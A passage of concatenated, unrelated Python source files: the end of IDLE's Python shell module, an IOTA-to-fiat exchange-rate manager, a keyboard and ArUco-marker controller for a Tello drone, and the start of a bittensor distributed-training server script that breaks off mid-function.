debugger.run(code, self.locals)
else:
exec code in self.locals
except SystemExit:
if not self.tkconsole.closing:
if tkMessageBox.askyesno(
"Exit?",
"Do you want to exit altogether?",
default="yes",
master=self.tkconsole.text):
raise
else:
self.showtraceback()
else:
raise
except:
if use_subprocess:
print >>self.tkconsole.stderr, \
"IDLE internal error in runcode()"
self.showtraceback()
self.tkconsole.endexecuting()
else:
if self.tkconsole.canceled:
self.tkconsole.canceled = False
print >>self.tkconsole.stderr, "KeyboardInterrupt"
else:
self.showtraceback()
finally:
if not use_subprocess:
try:
self.tkconsole.endexecuting()
except AttributeError: # shell may have closed
pass
def write(self, s):
"Override base class method"
self.tkconsole.stderr.write(s)
def display_port_binding_error(self):
tkMessageBox.showerror(
"Port Binding Error",
"IDLE can't bind TCP/IP port 8833, which is necessary to "
"communicate with its Python execution server. Either "
"no networking is installed on this computer or another "
"process (another IDLE?) is using the port. Run IDLE with the -n "
"command line switch to start without a subprocess and refer to "
"Help/IDLE Help 'Running without a subprocess' for further "
"details.",
master=self.tkconsole.text)
def display_no_subprocess_error(self):
tkMessageBox.showerror(
"Subprocess Startup Error",
"IDLE's subprocess didn't make connection. Either IDLE can't "
"start a subprocess or personal firewall software is blocking "
"the connection.",
master=self.tkconsole.text)
def display_executing_dialog(self):
tkMessageBox.showerror(
"Already executing",
"The Python Shell window is already executing a command; "
"please wait until it is finished.",
master=self.tkconsole.text)
class PyShell(OutputWindow):
shell_title = "Python Shell"
# Override classes
ColorDelegator = ModifiedColorDelegator
UndoDelegator = ModifiedUndoDelegator
# Override menus
menu_specs = [
("file", "_File"),
("edit", "_Edit"),
("debug", "_Debug"),
("options", "_Options"),
("windows", "_Windows"),
("help", "_Help"),
]
if macosxSupport.runningAsOSXApp():
del menu_specs[-3]
menu_specs[-2] = ("windows", "_Window")
# New classes
from IdleHistory import History
def __init__(self, flist=None):
if use_subprocess:
ms = self.menu_specs
if ms[2][0] != "shell":
ms.insert(2, ("shell", "She_ll"))
self.interp = ModifiedInterpreter(self)
if flist is None:
root = Tk()
fixwordbreaks(root)
root.withdraw()
flist = PyShellFileList(root)
#
OutputWindow.__init__(self, flist, None, None)
#
## self.config(usetabs=1, indentwidth=8, context_use_ps1=1)
self.usetabs = True
# indentwidth must be 8 when using tabs. See note in EditorWindow:
self.indentwidth = 8
self.context_use_ps1 = True
#
text = self.text
text.configure(wrap="char")
text.bind("<<newline-and-indent>>", self.enter_callback)
text.bind("<<plain-newline-and-indent>>", self.linefeed_callback)
text.bind("<<interrupt-execution>>", self.cancel_callback)
text.bind("<<end-of-file>>", self.eof_callback)
text.bind("<<open-stack-viewer>>", self.open_stack_viewer)
text.bind("<<toggle-debugger>>", self.toggle_debugger)
text.bind("<<toggle-jit-stack-viewer>>", self.toggle_jit_stack_viewer)
if use_subprocess:
text.bind("<<view-restart>>", self.view_restart_mark)
text.bind("<<restart-shell>>", self.restart_shell)
#
self.save_stdout = sys.stdout
self.save_stderr = sys.stderr
self.save_stdin = sys.stdin
import IOBinding
self.stdout = PseudoFile(self, "stdout", IOBinding.encoding)
self.stderr = PseudoFile(self, "stderr", IOBinding.encoding)
self.console = PseudoFile(self, "console", IOBinding.encoding)
if not use_subprocess:
sys.stdout = self.stdout
sys.stderr = self.stderr
sys.stdin = self
#
self.history = self.History(self.text)
#
self.pollinterval = 50 # millisec
def get_standard_extension_names(self):
return idleConf.GetExtensions(shell_only=True)
reading = False
executing = False
canceled = False
endoffile = False
closing = False
def set_warning_stream(self, stream):
global warning_stream
warning_stream = stream
def get_warning_stream(self):
return warning_stream
def toggle_debugger(self, event=None):
if self.executing:
tkMessageBox.showerror("Don't debug now",
"You can only toggle the debugger when idle",
master=self.text)
self.set_debugger_indicator()
return "break"
else:
db = self.interp.getdebugger()
if db:
self.close_debugger()
else:
self.open_debugger()
def set_debugger_indicator(self):
db = self.interp.getdebugger()
self.setvar("<<toggle-debugger>>", not not db)
def toggle_jit_stack_viewer(self, event=None):
pass # All we need is the variable
def close_debugger(self):
db = self.interp.getdebugger()
if db:
self.interp.setdebugger(None)
db.close()
if self.interp.rpcclt:
RemoteDebugger.close_remote_debugger(self.interp.rpcclt)
self.resetoutput()
self.console.write("[DEBUG OFF]\n")
sys.ps1 = ">>> "
self.showprompt()
self.set_debugger_indicator()
def open_debugger(self):
if self.interp.rpcclt:
dbg_gui = RemoteDebugger.start_remote_debugger(self.interp.rpcclt,
self)
else:
dbg_gui = Debugger.Debugger(self)
self.interp.setdebugger(dbg_gui)
dbg_gui.load_breakpoints()
sys.ps1 = "[DEBUG ON]\n>>> "
self.showprompt()
self.set_debugger_indicator()
def beginexecuting(self):
"Helper for ModifiedInterpreter"
self.resetoutput()
self.executing = 1
def endexecuting(self):
"Helper for ModifiedInterpreter"
self.executing = 0
self.canceled = 0
self.showprompt()
def close(self):
"Extend EditorWindow.close()"
if self.executing:
response = tkMessageBox.askokcancel(
"Kill?",
"The program is still running!\n Do you want to kill it?",
default="ok",
parent=self.text)
if response is False:
return "cancel"
if self.reading:
self.top.quit()
self.canceled = True
self.closing = True
# Wait for poll_subprocess() rescheduling to stop
self.text.after(2 * self.pollinterval, self.close2)
def close2(self):
return EditorWindow.close(self)
def _close(self):
"Extend EditorWindow._close(), shut down debugger and execution server"
self.close_debugger()
if use_subprocess:
self.interp.kill_subprocess()
# Restore std streams
sys.stdout = self.save_stdout
sys.stderr = self.save_stderr
sys.stdin = self.save_stdin
# Break cycles
self.interp = None
self.console = None
self.flist.pyshell = None
self.history = None
EditorWindow._close(self)
def ispythonsource(self, filename):
"Override EditorWindow method: never remove the colorizer"
return True
def short_title(self):
return self.shell_title
COPYRIGHT = \
'Type "copyright", "credits" or "license()" for more information.'
firewallmessage = """
****************************************************************
Personal firewall software may warn about the connection IDLE
makes to its subprocess using this computer's internal loopback
interface. This connection is not visible on any external
interface and no data is sent to or received from the Internet.
****************************************************************
"""
def begin(self):
self.resetoutput()
if use_subprocess:
nosub = ''
client = self.interp.start_subprocess()
if not client:
self.close()
return False
else:
nosub = "==== No Subprocess ===="
self.write("Python %s on %s\n%s\n%s\nIDLE %s %s\n" %
(sys.version, sys.platform, self.COPYRIGHT,
self.firewallmessage, idlever.IDLE_VERSION, nosub))
self.showprompt()
import Tkinter
Tkinter._default_root = None # 03Jan04 KBK What's this?
return True
def readline(self):
save = self.reading
try:
self.reading = 1
self.top.mainloop() # nested mainloop()
finally:
self.reading = save
line = self.text.get("iomark", "end-1c")
if len(line) == 0: # may be EOF if we quit our mainloop with Ctrl-C
line = "\n"
if isinstance(line, unicode):
import IOBinding
try:
line = line.encode(IOBinding.encoding)
except UnicodeError:
pass
self.resetoutput()
if self.canceled:
self.canceled = 0
if not use_subprocess:
raise KeyboardInterrupt
if self.endoffile:
self.endoffile = 0
line = ""
return line
def isatty(self):
return True
def cancel_callback(self, event=None):
try:
if self.text.compare("sel.first", "!=", "sel.last"):
return # Active selection -- always use default binding
except:
pass
if not (self.executing or self.reading):
self.resetoutput()
self.interp.write("KeyboardInterrupt\n")
self.showprompt()
return "break"
self.endoffile = 0
self.canceled = 1
if (self.executing and self.interp.rpcclt):
if self.interp.getdebugger():
self.interp.restart_subprocess()
else:
self.interp.interrupt_subprocess()
if self.reading:
self.top.quit() # exit the nested mainloop() in readline()
return "break"
def eof_callback(self, event):
if self.executing and not self.reading:
return # Let the default binding (delete next char) take over
if not (self.text.compare("iomark", "==", "insert") and
self.text.compare("insert", "==", "end-1c")):
return # Let the default binding (delete next char) take over
if not self.executing:
self.resetoutput()
self.close()
else:
self.canceled = 0
self.endoffile = 1
self.top.quit()
return "break"
def linefeed_callback(self, event):
# Insert a linefeed without entering anything (still autoindented)
if self.reading:
self.text.insert("insert", "\n")
self.text.see("insert")
else:
self.newline_and_indent_event(event)
return "break"
def enter_callback(self, event):
if self.executing and not self.reading:
return # Let the default binding (insert '\n') take over
# If some text is selected, recall the selection
# (but only if this before the I/O mark)
try:
sel = self.text.get("sel.first", "sel.last")
if sel:
if self.text.compare("sel.last", "<=", "iomark"):
self.recall(sel, event)
return "break"
except:
pass
# If we're strictly before the line containing iomark, recall
# the current line, less a leading prompt, less leading or
# trailing whitespace
if self.text.compare("insert", "<", "iomark linestart"):
# Check if there's a relevant stdin range -- if so, use it
prev = self.text.tag_prevrange("stdin", "insert")
if prev and self.text.compare("insert", "<", prev[1]):
self.recall(self.text.get(prev[0], prev[1]), event)
return "break"
next = self.text.tag_nextrange("stdin", "insert")
if next and self.text.compare("insert lineend", ">=", next[0]):
self.recall(self.text.get(next[0], next[1]), event)
return "break"
# No stdin mark -- just get the current line, less any prompt
indices = self.text.tag_nextrange("console", "insert linestart")
if indices and \
self.text.compare(indices[0], "<=", "insert linestart"):
self.recall(self.text.get(indices[1], "insert lineend"), event)
else:
self.recall(self.text.get("insert linestart", "insert lineend"), event)
return "break"
# If we're between the beginning of the line and the iomark, i.e.
# in the prompt area, move to the end of the prompt
if self.text.compare("insert", "<", "iomark"):
self.text.mark_set("insert", "iomark")
# If we're in the current input and there's only whitespace
# beyond the cursor, erase that whitespace first
s = self.text.get("insert", "end-1c")
if s and not s.strip():
self.text.delete("insert", "end-1c")
# If we're in the current input before its last line,
# insert a newline right at the insert point
if self.text.compare("insert", "<", "end-1c linestart"):
self.newline_and_indent_event(event)
return "break"
# We're in the last line; append a newline and submit it
self.text.mark_set("insert", "end-1c")
if self.reading:
self.text.insert("insert", "\n")
self.text.see("insert")
else:
self.newline_and_indent_event(event)
self.text.tag_add("stdin", "iomark", "end-1c")
self.text.update_idletasks()
if self.reading:
self.top.quit() # Break out of recursive mainloop() in raw_input()
else:
self.runit()
return "break"
def recall(self, s, event):
# remove leading and trailing empty or whitespace lines
s = re.sub(r'^\s*\n', '' , s)
s = re.sub(r'\n\s*$', '', s)
lines = s.split('\n')
self.text.undo_block_start()
try:
self.text.tag_remove("sel", "1.0", "end")
self.text.mark_set("insert", "end-1c")
prefix = self.text.get("insert linestart", "insert")
if prefix.rstrip().endswith(':'):
self.newline_and_indent_event(event)
prefix = self.text.get("insert linestart", "insert")
self.text.insert("insert", lines[0].strip())
if len(lines) > 1:
orig_base_indent = re.search(r'^([ \t]*)', lines[0]).group(0)
new_base_indent = re.search(r'^([ \t]*)', prefix).group(0)
for line in lines[1:]:
if line.startswith(orig_base_indent):
# replace orig base indentation with new indentation
line = new_base_indent + line[len(orig_base_indent):]
self.text.insert('insert', '\n'+line.rstrip())
finally:
self.text.see("insert")
self.text.undo_block_stop()
def runit(self):
line = self.text.get("iomark", "end-1c")
# Strip off last newline and surrounding whitespace.
# (To allow you to hit return twice to end a statement.)
i = len(line)
while i > 0 and line[i-1] in " \t":
i = i-1
if i > 0 and line[i-1] == "\n":
i = i-1
while i > 0 and line[i-1] in " \t":
i = i-1
line = line[:i]
more = self.interp.runsource(line)
def open_stack_viewer(self, event=None):
if self.interp.rpcclt:
return self.interp.remote_stack_viewer()
try:
sys.last_traceback
except:
tkMessageBox.showerror("No stack trace",
"There is no stack trace yet.\n"
"(sys.last_traceback is not defined)",
master=self.text)
return
from StackViewer import StackBrowser
sv = StackBrowser(self.root, self.flist)
def view_restart_mark(self, event=None):
self.text.see("iomark")
self.text.see("restart")
def restart_shell(self, event=None):
self.interp.restart_subprocess()
def showprompt(self):
self.resetoutput()
try:
s = str(sys.ps1)
except:
s = ""
self.console.write(s)
self.text.mark_set("insert", "end-1c")
self.set_line_and_column()
self.io.reset_undo()
def resetoutput(self):
source = self.text.get("iomark", "end-1c")
if self.history:
self.history.history_store(source)
if self.text.get("end-2c") != "\n":
self.text.insert("end-1c", "\n")
self.text.mark_set("iomark", "end-1c")
self.set_line_and_column()
sys.stdout.softspace = 0
def write(self, s, tags=()):
try:
self.text.mark_gravity("iomark", "right")
OutputWindow.write(self, s, tags, "iomark")
self.text.mark_gravity("iomark", "left")
except:
pass
if self.canceled:
self.canceled = 0
if not use_subprocess:
raise KeyboardInterrupt
class PseudoFile(object):
def __init__(self, shell, tags, encoding=None):
self.shell = shell
self.tags = tags
self.softspace = 0
self.encoding = encoding
def write(self, s):
self.shell.write(s, self.tags)
def writelines(self, l):
map(self.write, l)
def flush(self):
pass
def isatty(self):
return True
usage_msg = """\
USAGE: idle [-deins] [-t title] [file]*
idle [-dns] [-t title] (-c cmd | -r file) [arg]*
idle [-dns] [-t title] - [arg]*
-h print this help message and exit
-n run IDLE without a subprocess (see Help/IDLE Help for details)
The following options will override the IDLE 'settings' configuration:
-e open an edit window
-i open a shell window
The following options imply -i and will open a shell:
-c cmd run the command in a shell, or
-r file run script from file
-d enable the debugger
-s run $IDLESTARTUP or $PYTHONSTARTUP before anything else
-t title set title of shell window
A default edit window will be bypassed when -c, -r, or - are used.
[arg]* are passed to the command (-c) or script (-r) in sys.argv[1:].
Examples:
idle
Open an edit window or shell depending on IDLE's configuration.
idle foo.py foobar.py
Edit the files, also open a shell if configured to start with shell.
idle -est "Baz" foo.py
Run $IDLESTARTUP or $PYTHONSTARTUP, edit foo.py, and open a shell
window with the title "Baz".
idle -c "import sys; print sys.argv" "foo"
Open a shell window and run the command, passing "-c" in sys.argv[0]
and "foo" in sys.argv[1].
idle -d -s -r foo.py "Hello World"
Open a shell window, run a startup script, enable the debugger, and
run foo.py, passing "foo.py" in sys.argv[0] and "Hello World" in
sys.argv[1].
echo "import sys; print sys.argv" | idle - "foobar"
Open a shell window, run the script piped in, passing '' in sys.argv[0]
and "foobar" in sys.argv[1].
"""
def main():
global flist, root, use_subprocess
use_subprocess = True
enable_shell = False
enable_edit = False
debug = False
cmd = None
script = None
startup = False
try:
opts, args = getopt.getopt(sys.argv[1:], "c:deihnr:st:")
except getopt.error, msg:
sys.stderr.write("Error: %s\n" % str(msg))
sys.stderr.write(usage_msg)
sys.exit(2)
for o, a in opts:
if o == '-c':
cmd = a
enable_shell = True
if o == '-d':
debug = True
enable_shell = True
if o == '-e':
enable_edit = True
if o == '-h':
sys.stdout.write(usage_msg)
sys.exit()
if o == '-i':
enable_shell = True
if o == '-n':
use_subprocess = False
if o == '-r':
script = a
if os.path.isfile(script):
pass
else:
print "No script file: ", script
sys.exit()
enable_shell = True
if o == '-s':
startup = True
enable_shell = True
if o == '-t':
PyShell.shell_title = a
enable_shell = True
if args and args[0] == '-':
cmd = sys.stdin.read()
enable_shell = True
# process sys.argv and sys.path:
for i in range(len(sys.path)):
sys.path[i] = os.path.abspath(sys.path[i])
if args and args[0] == '-':
sys.argv = [''] + args[1:]
elif cmd:
sys.argv = ['-c'] + args
elif script:
sys.argv = [script] + args
elif args:
enable_edit = True
pathx = []
for filename in args:
pathx.append(os.path.dirname(filename))
for dir in pathx:
dir = os.path.abspath(dir)
if not dir in sys.path:
sys.path.insert(0, dir)
else:
dir = os.getcwd()
if not dir in sys.path:
sys.path.insert(0, dir)
# check the IDLE settings configuration (but command line overrides)
edit_start = idleConf.GetOption('main', 'General',
'editor-on-startup', type='bool')
enable_edit = enable_edit or edit_start
enable_shell = enable_shell or not edit_start
# start editor and/or shell windows:
root = Tk(className="Idle")
fixwordbreaks(root)
root.withdraw()
flist = PyShellFileList(root)
macosxSupport.setupApp(root, flist)
if enable_edit:
if not (cmd or script):
for filename in args:
flist.open(filename)
if not args:
flist.new()
if enable_shell:
shell = flist.open_shell()
if not shell:
return # couldn't open shell
if macosxSupport.runningAsOSXApp() and flist.dict:
# On OSX: when the user has double-clicked on a file that causes
# IDLE to be launched the shell window will open just in front of
# the file she wants to see. Lower the interpreter window when
# there are open files.
shell.top.lower()
shell = flist.pyshell
# handle remaining options:
if debug:
shell.open_debugger()
if startup:
filename = os.environ.get("IDLESTARTUP") or \
os.environ.get("PYTHONSTARTUP")
if filename and os.path.isfile(filename):
shell.interp.execfile(filename)
if shell and cmd or script:
shell.interp.runcommand("""if 1:
import sys as _sys
_sys.argv = %r
del _sys
\n""" % (sys.argv,))
if cmd:
shell.interp.execsource(cmd)
elif script:
shell.interp.prepend_syspath(script)
shell.interp.execfile(script)
root.mainloop()
root.destroy()
if __name__ == "__main__":
sys.modules['PyShell'] = sys.modules['__main__']
main()
|
__init__.py
|
"""
iota-exrate-manager
Python package that keeps track of iota exchange rates via various APIs and converts prices
"""
__version__ = "0.1.2"
__author__ = 'F-Node-Karlsruhe'
from .apis import coingecko, cmc
from datetime import datetime, timedelta
import sched
import time
import warnings
import threading
SUPPORTED_CURRENCIES = {'usd', 'eur', 'gbp', 'jpy', 'chf', 'cad'}
class ExRateManager:
_ex_rates = {}
_apis = {'coinmarketcap', 'coingecko'}
_last_updated = None
"""Create a ExRateManager.
:param refresh_rate: Refresh rate in seconds.
Default 300
:param delay_threshold: After which time without a successful refresh a warning is emitted
in times refresh rate.
Default 3
:param currencies: List of currencies quotes for iota which are fetched.
Default ['usd']
:param cmc_api_key: The coinmarketcap API key to fetch the cmc API.
Default None
"""
def __init__(self,
refresh_rate=300,
delay_threshold=3,
currencies=['usd'],
cmc_api_key=None):
for currency in currencies:
if currency not in SUPPORTED_CURRENCIES:
raise Exception('Currency %s not supported' % currency)
self._currencies = currencies
if cmc_api_key is None:
self._apis.remove('coinmarketcap')
else:
self._cmc_api_key = cmc_api_key
self._scheduler = sched.scheduler(time.time, time.sleep)
self._refresh_rate = refresh_rate
self._delay_threshold = delay_threshold
# run refresh as a deamon thread
thread = threading.Thread(target=self.__refresh)
thread.daemon = True
thread.start()
def __refresh(self):
if 'coinmarketcap' in self._apis:
cmc_exrates = cmc(self._currencies, self._cmc_api_key)
if cmc_exrates:
self.__update_exrates(cmc_exrates)
return
# use coingecko as default
cg_exrates = coingecko(self._currencies)
if cg_exrates:
self.__update_exrates(cg_exrates)
return
# schedule new try even if both fail
self._scheduler.enter(self._refresh_rate, 1, self.__refresh)
self._scheduler.run()
def __update_exrates(self, update):
self._ex_rates.update(update)
self._last_updated = datetime.utcnow()
# schedule new refresh run
self._scheduler.enter(self._refresh_rate, 1, self.__refresh)
self._scheduler.run()
def up_to_date(self):
'''
Returns true if the last update was not longer ago than the specified threshold
'''
if self._last_updated:
return datetime.utcnow() < self._last_updated + timedelta(seconds=self._delay_threshold * self._refresh_rate)
return False
def iota_to_fiat(self, amount, currency=None, decimal_digits=2):
'''
Converts an iota amount into the requested currency
'''
if currency is None:
currency = self._currencies[0]
if not self.up_to_date():
warnings.warn('Exchange rates are not up to date. Last updated %s' % self._last_updated)
return round(self._ex_rates[currency] * amount / 1_000_000, decimal_digits)
def fiat_to_iota(self, amount, currency=None):
'''
Converts an amount of the specified currency into iota
'''
if currency is None:
currency = self._currencies[0]
if not self.up_to_date():
warnings.warn('Exchange rates are not up to date. Last updated %s' % self._last_updated)
return int(amount / self._ex_rates[currency] * 1_000_000)
|
main.py
|
from djitellopy import Tello
import cv2
import pygame
from pygame.locals import *
import numpy as np
import time
import queue
import threading
from cam_class import Camera
from timeit import default_timer as timer
from video_writer import WriteVideo
# Speed of the drone
S = 60
# Speed for autonomous navigation
S_prog = 15
# Frames per second of the pygame window display
FPS = 25
class FrontEnd(object):
""" Maintains the Tello display and moves it through the keyboard keys.
Press escape key to quit.
The controls are:
- T: Takeoff
- L: Land
- Arrow keys: Forward, backward, left and right.
- A and D: Counter clockwise and clockwise rotations
- W and S: Up and down.
"""
def __init__(self):
# Init pygame
pygame.init()
# Creat pygame window
pygame.display.set_caption("Tello video stream")
self.width = 640
self.height = 480
self.screen = pygame.display.set_mode([self.width, self.height])
# create queue for data communications
self.data_queue=queue.Queue()
# Init Tello object that interacts with the Tello drone
self.tello = Tello(self.data_queue)
# Drone velocities between -100~100
self.for_back_velocity = 0
self.left_right_velocity = 0
self.up_down_velocity = 0
self.yaw_velocity = 0
self.speed = 10
# Variables for drone's states
self.battery = 0
self.angles = [0., 0., 0., 0.]
# Direction queue for navigation
self.dir_queue=queue.Queue()
self.dir_queue.queue.clear()
# Bool variables for setting functions
self.send_rc_control = False
self.calibrate = False
self.getPoints = False
self.resetPoints = False
self.save = False
self.getOrigin = False
# Creating video queue
self.video_queue = queue.Queue()
self.video_queue.queue.clear()
self.END_event = threading.Event()
self.END_event.clear()
self.videoWrite = WriteVideo(self.video_queue, FPS, self.END_event)
# Run video writer in the background
thread_vid = threading.Thread(target=self.videoWrite.writer)
thread_vid.daemon = True
thread_vid.start()
# Data collection event
self.getCoords_event = threading.Event()
self.getCoords_event.clear()
# Navigate between markers
self.navigate_event = threading.Event()
self.navigate_event.clear()
# Camera class
self.cam = Camera(S_prog, self.dir_queue, 'calibration_files/camcalib.npz',
self.getCoords_event, self.navigate_event, self.END_event)
# Create update timer
pygame.time.set_timer(USEREVENT + 1, 50)
def run(self):
if not self.tello.connect():
print("Tello not connected")
return
if not self.tello.set_speed(self.speed):
print("Not set speed to lowest possible")
return
# In case streaming is on. This happens when we quit this program without the escape key.
if not self.tello.streamoff():
print("Could not stop video stream")
return
if not self.tello.streamon():
print("Could not start video stream")
return
frame_read = self.tello.get_frame_read()
directions = np.zeros(4)
should_stop = False
while not should_stop:
img=cv2.resize(frame_read.frame, (960,720))
# Read from drone state queue
if not self.data_queue.empty():
pitch, roll, yaw, tof, bat = self.data_queue.get()
self.data_queue.queue.clear()
self.battery = bat
self.angles_tof = [pitch, roll, yaw, tof]
#print([pitch, roll, yaw, tof])
# Calibrate drone camera
if self.calibrate:
img = self.cam.calibrator(img)
# Detect ArUco markers
img = self.cam.aruco(img, self.getPoints, self.resetPoints, self.angles_tof)
# Reset measurements
if self.resetPoints:
self.resetPoints=False
for event in pygame.event.get():
if event.type == USEREVENT + 1:
self.update(directions)
elif event.type == QUIT:
should_stop = True
elif event.type == KEYDOWN:
if event.key == K_ESCAPE:
should_stop = True
else:
self.keydown(event.key)
elif event.type == KEYUP:
self.keyup(event.key)
if frame_read.stopped:
frame_read.stop()
break
# Save image on 'M' press
if self.save:
timestr = time.strftime("%Y%m%d_%H%M%S")
cv2.imwrite("images/"+timestr+".jpg", img)
self.save = False
# Navigation started, points and video capture
if self.getCoords_event.is_set():
self.video_queue.put(np.copy(img))
# Write battery percentage
img = self.cam.writeBattery(img, self.battery)
img=cv2.resize(img, (640,480))
# Resize pyGame window
if (img.shape[1] != self.width) or (img.shape[0] != self.height):
self.width = img.shape[1]
self.height = img.shape[0]
self.screen=pygame.display.set_mode((self.width, self.height))
self.screen.fill([0, 0, 0])
frame = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
frame = np.rot90(frame)
frame = np.flipud(frame)
frame = pygame.surfarray.make_surface(frame)
self.screen.blit(frame, (0, 0))
pygame.display.update()
time.sleep(1 / FPS)
# Call it always before finishing. I deallocate resources.
self.tello.end()
def keydown(self, key):
""" Update velocities based on key pressed
Arguments:
key: pygame key
"""
if key == pygame.K_UP: # set forward velocity
self.for_back_velocity = S
elif key == pygame.K_DOWN: # set backward velocity
self.for_back_velocity = -S
elif key == pygame.K_LEFT: # set left velocity
self.left_right_velocity = -S
elif key == pygame.K_RIGHT: # set right velocity
self.left_right_velocity = S
elif key == pygame.K_w: # set up velocity
self.up_down_velocity = S
elif key == pygame.K_s: # set down velocity
self.up_down_velocity = -S
elif key == pygame.K_a: # set yaw clockwise velocity
self.yaw_velocity = -S
elif key == pygame.K_d: # set yaw counter clockwise velocity
self.yaw_velocity = S
def keyup(self, key):
""" Update velocities based on key released
Arguments:
key: pygame key
"""
if key == pygame.K_UP or key == pygame.K_DOWN: # set zero forward/backward velocity
self.for_back_velocity = 0
elif key == pygame.K_LEFT or key == pygame.K_RIGHT: # set zero left/right velocity
self.left_right_velocity = 0
elif key == pygame.K_w or key == pygame.K_s: # set zero up/down velocity
self.up_down_velocity = 0
elif key == pygame.K_a or key == pygame.K_d: # set zero yaw velocity
self.yaw_velocity = 0
elif key == pygame.K_t: # takeoff
self.tello.takeoff()
self.send_rc_control = True
elif key == pygame.K_l: # land
self.tello.land()
self.send_rc_control = False
elif key == pygame.K_k: # camera calibration
if self.calibrate:
self.calibrate = False
else:
self.calibrate = True
elif key == pygame.K_c: # get aruco marker points
if self.getPoints:
self.getPoints=False
else:
self.getPoints = True
self.resetPoints = True
elif key == pygame.K_m: # save image
self.save = True
elif key == pygame.K_o: # start navigation
if self.navigate_event.is_set():
self.navigate_event.clear()
else:
self.navigate_event.set()
elif key == pygame.K_x: # end video
self.END_event.set()
self.getPoints = False
def update(self, dirs):
""" Update routine. Send velocities to Tello."""
if self.send_rc_control:
if self.navigate_event.is_set() and not self.dir_queue.empty():
# Auto navigation, read directions queue
x, y, z, yaw = self.dir_queue.get()
self.tello.send_rc_control(int(x), int(y), int(z), int(yaw))
else:
# Clear directions queue to avoid storing old data
self.dir_queue.queue.clear()
# Control tello manually
self.tello.send_rc_control(self.left_right_velocity, self.for_back_velocity, self.up_down_velocity,
self.yaw_velocity)
def main():
frontend = FrontEnd()
# run frontend
frontend.run()
if __name__ == '__main__':
main()
|
ddp_run.py
|
#!/bin/python3
# The MIT License (MIT)
# Copyright © 2021 Yuma Rao
# Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated
# documentation files (the “Software”), to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included in all copies or substantial portions of
# the Software.
# THE SOFTWARE IS PROVIDED “AS IS”, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO
# THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
# DEALINGS IN THE SOFTWARE.
""" Advanced server neuron.
Example:
$ python miners/text/multitron_server/main.py
"""
from re import I
import bittensor
import torch
import pandas
import datetime
import traceback
import sys
import os
from loguru import logger; logger = logger.opt(colors=True)
from torch.nn.utils import clip_grad_norm_
from datetime import datetime,timedelta
from threading import Lock
from torch.nn.parallel import DistributedDataParallel as DDP
import torch.distributed as dist
import torch.multiprocessing as mp
import time
from multiprocessing import Process, Manager, Event
import threading
os.environ['TOKENIZERS_PARALLELISM'] = 'false'
torch.autograd.set_detect_anomaly(True)
class DDPPipe():
def __init__( self, config: 'bittensor.config', gp_server, wallet: 'bittensor.wallet', forward_q, events, outputs):
r""" Initializes the neuron with the passed config.
"""
torch.autograd.set_detect_anomaly(True)
self.config = config
self.config.to_defaults()
self.gp_server = gp_server# .to(gp_server.device)
self.wallet = wallet
self.world_size = config.neuron.world_size
self.forward_q = forward_q
self.events = events
self.outputs = outputs
def init_process(self, rank):
r""" For each process, anchor them to the process group
so that they know how to communication with each other.
Args:
rank (int):
rank (id) of the process.
"""
os.environ['MASTER_ADDR'] = self.config.neuron.address
os.environ['MASTER_PORT'] = self.config.neuron.port
if 'cuda' in self.config.neuron.device:
backend = 'nccl'
else:
backend = 'gloo'
dist.init_process_group(
backend,
rank=rank,
world_size=self.world_size,
)
def init_bit(self, rank = 0):
r""" Init bittensor modules after spawning process.
Args:
rank (int):
rank (id) of the process.
"""
self.device = torch.device( device = f'cuda:{rank}' )
self.gp_server.device = self.device
self.gp_server = self.gp_server.to(self.device)
self.subtensor = bittensor.subtensor ( config = self.config )
self.metagraph = bittensor.metagraph ( config = self.config, subtensor = self.subtensor )
self.metagraph.sync()
self.optimizer = torch.optim.SGD(
[ {'params': self.gp_server.parameters() } ],
lr = self.config.neuron.learning_rate,
momentum = self.config.neuron.momentum,
)
if rank == 0 :
logger.success( self.subtensor )
self.subtensor.register( self.wallet )
bittensor.tokenizer()
def cleanup(self):
r""" Kill the process.
"""
dist.destroy_process_group()
def run_parallel( self, ready = None):
r""" Spawn multiple processes.
"""
self.process_ctx = mp.spawn(self.run,
args=(self.world_size, ready),
nprocs=self.world_size,
join = True
)
def run(self, rank = 0, world_size = 0, ready= None):
self.init_bit(rank)
if self.config.neuron.restart == False:
self.gp_server.load(self.config.neuron.full_path)
self.gp_server = self.gp_server.to(self.device)
nn = self.subtensor.neuron_for_pubkey(self.wallet.hotkey.ss58_address)
uid = nn.uid
# --- last sync block
last_sync_block = self.subtensor.get_current_block()
last_set_block = last_sync_block
last_log_block = last_sync_block
last_log_time = time.time()
# -- Main Training loop --
if ready != None and rank == 0 :
ready.set()
try:
torch.cuda.empty_cache()
while True:
try:
request_id, inputs_x = self.forward_q.get(timeout = self.config.neuron.console_log_time)
if inputs_x != None:
inputs_x = inputs_x.to(self.device)
output = self.gp_server.encode_forward(inputs_x)
output_clone = output.detach().clone().to(device = 'cpu')
self.outputs[request_id] = output_clone
self.events[request_id].set()
del output
del output_clone
del inputs_x
torch.cuda.empty_cache()
except Exception as e:
logger.warning(e)
if 'out of memory' in str(e):
for p in self.gp_server.pre_model.parameters():
if p.grad is not None:
del p.grad
if inputs_x != None:
del inputs_x
torch.cuda.empty_cache()
bittensor.logging.success('cleaned memory', sufix = f'rank: {rank}, {e}')
# log if a certain time period had passed
# checking with time instead of block here to avoid frequent syncing from subtensor in a while loop
if time.time() - last_log_time > self.config.neuron.console_log_time:
last_log_time = time.time()
# ---- syncing metagraph for all rank
current_block = self.subtensor.get_current_block()
if current_block - last_sync_block > self.config.neuron.metagraph_sync:
self.metagraph.sync()
last_sync_block = current_block
# ---- console logging
if rank == 0:
# ---- data
data = {
'block': current_block,
'stake': nn.stake,
'rank': nn.rank,
'incentive': nn.incentive,
'trust': nn.trust,
'consensus': nn.consensus,
'incentive': nn.incentive,
'dividends': nn.dividends,
